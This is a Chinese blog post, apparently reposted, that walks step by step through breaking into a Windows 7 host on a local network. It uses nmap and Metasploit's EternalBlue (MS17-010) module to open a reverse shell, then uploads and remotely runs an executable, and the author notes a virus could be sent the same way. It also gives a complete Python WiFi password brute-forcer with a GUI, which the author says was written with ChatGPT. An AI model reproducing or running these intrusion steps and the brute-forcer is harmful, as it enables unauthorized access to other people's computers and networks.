提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
文章目录
前言
提示:这里可以添加本文要记录的大概内容:
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。
提示:以下是本篇文章正文内容,下面案例可供参考
一、信息收集
第一步,信息收集
先查找自己的IP地址以方便查找同局域网的设备
然后使用nmap -O以一个一个扫
看我找到了什么
找到了,正好开放445端口
二、开始入侵
1.启动msfconsole
msfconsole
启动成功了,搜索ms漏洞
2.搜索漏洞
search ms17_010
然后扔给我们这些东西,以前用过的知道该使用哪个
输入:
use exploit/windows/smb/ms17_010_eternalblue
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入
options
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
IP一定要设为目标的IP地址,然后我们再
options
已经都准备好了,可以进行入侵了,输入
run
[*] Started reverse TCP handler on 192.168.22.13:4444
这串代码讲的是开始反向TCP监听,监听本机的IP和端口
192.168.22.196:445 -Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)[*] 192.168.22.196:445 - Scanned 1 of 1 hosts (100% complete)
这串代码讲的是主机存在漏洞
然后哇啦哇啦,一顿准备
出现win了,已经渗透成功了
3.文件上传
我送给它安装DEV-c++吧
upload /路径/xxx.exe
上传完了,但上传到哪里了呢?
输入
pwd
可以看到在system32文件下
让我们运行它
输入
execute -f xxx.exe
-f是运行指定文件
好吧,我的报错了,原因我改了文件,至少远程启动文件了,也可以发送病毒并执行
其他
from tkinter import*from pywifi import const
import pywifi
import time
defwificonnect(str, wifiname):# 窗口无线对象
wifi = pywifi.PyWiFi()# 抓取第一个无线网卡
ifaces = wifi.interfaces()[0]# 断开所有的wifi
ifaces.disconnect()
time.sleep(0)if ifaces.status()== const.IFACE_DISCONNECTED:# 创建wifi连接文件
profile = pywifi.Profile()
profile.ssid = wifiname
# wifi的加密算法
profile.akm.append(const.AKM_TYPE_WPA2PSK)# wifi的密码
profile.key =str# 网卡的开发
profile.auth = const.AUTH_ALG_OPEN
# 加密单元,这里需要写点加密单元否则无法连接
profile.cipher = const.CIPHER_TYPE_CCMP
# 删除所有的wifi文件
ifaces.remove_all_network_profiles()# 设置新的连接文件
tep_profile = ifaces.add_network_profile(profile)# 连接
ifaces.connect(tep_profile)
time.sleep(1)if ifaces.status()== const.IFACE_CONNECTED:returnTrueelse:returnFalsedefreadPwd():# 获取wifi名称
wifiname = entry.get().strip()
path =r'./pwd.txt'file=open(path,'r')whileTrue:try:# 读取
mystr =file.readline().strip()# 测试连接bool= wificonnect(mystr, wifiname)ifbool:
text.insert(END,'这个密码是正确的'+ mystr)
text.see(END)
text.update()file.close()breakelse:
text.insert(END,'这个密码是错误的'+ mystr)
text.see(END)
text.update()except:continue# 创建窗口
root = Tk()
root.title('wifi万能爆破器')
root.geometry('900x600')# 标签
label = Label(root, text='输入要爆破的WIFI:')# 定位
label.grid()# 输入控件
entry = Entry(root, font=('微软雅黑',20))
entry.grid(row=0, column=1)# 列表控件
text = Listbox(root, font=('微软雅黑',20), width=40, height=10)
text.grid(row=1, columnspan=15)# 按钮
button = Button(root, text='开始爆破', width=20, height=2, command=readPwd)
button.grid(row=2, columnspan=2)# 显示窗口
root.mainloop()
既然要联网肯定要联网,废话文学 这是我和chat gpt连夜写的,单纯只是密码爆破,嘿嘿
字典自己准备,网上一大堆,一搜一大把
总结
本文就是讲解远程控制并执行文件
版权归原作者 Neatsuki 所有, 如有侵权,请联系我们删除。